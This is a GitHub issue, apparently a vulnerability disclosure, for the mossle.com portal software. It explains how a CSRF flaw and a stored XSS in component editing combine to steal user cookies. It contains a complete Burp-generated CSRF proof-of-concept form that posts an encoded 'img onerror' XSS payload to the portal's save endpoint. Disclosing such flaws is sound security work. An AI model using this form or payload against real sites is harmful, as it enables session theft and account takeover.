Skip to content

Csrf + Xss combination Can be obtained user cookie #199

New issue
New issue
Open
Open
Csrf + Xss combination Can be obtained user cookie#199
@unknownerror-bot

Description

@unknownerror-bot
unknownerror-bot
opened on Oct 15, 2019

Product Homepage: http://www.mossle.com/index.do
Place of backstage exists Csrf Vulnerability,attacker Structure a csrf payload,Once the administrator clicks on the malicious link, the component information is automatically add.
There is an xss in the place of Editing component

1571127417546

We can write an xss first, and then construct the csrf code, so that after the account clicks on the malicious link of the attacker, it will execute csrf, and the website will have an xss. As long as the account visits the page , he can get him Cookie

Csrf Exp:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://www.mossle.com/portal/save.do" method="POST">
      <input type="hidden" name="portalWidgetId" value="5557079425024" />
      <input type="hidden" name="portalItemName" value="&lt;img&#32;src&#61;x&#32;onerror&#61;alert&#40;&apos;cookie&apos;&#41;&gt;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

1571127847476

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions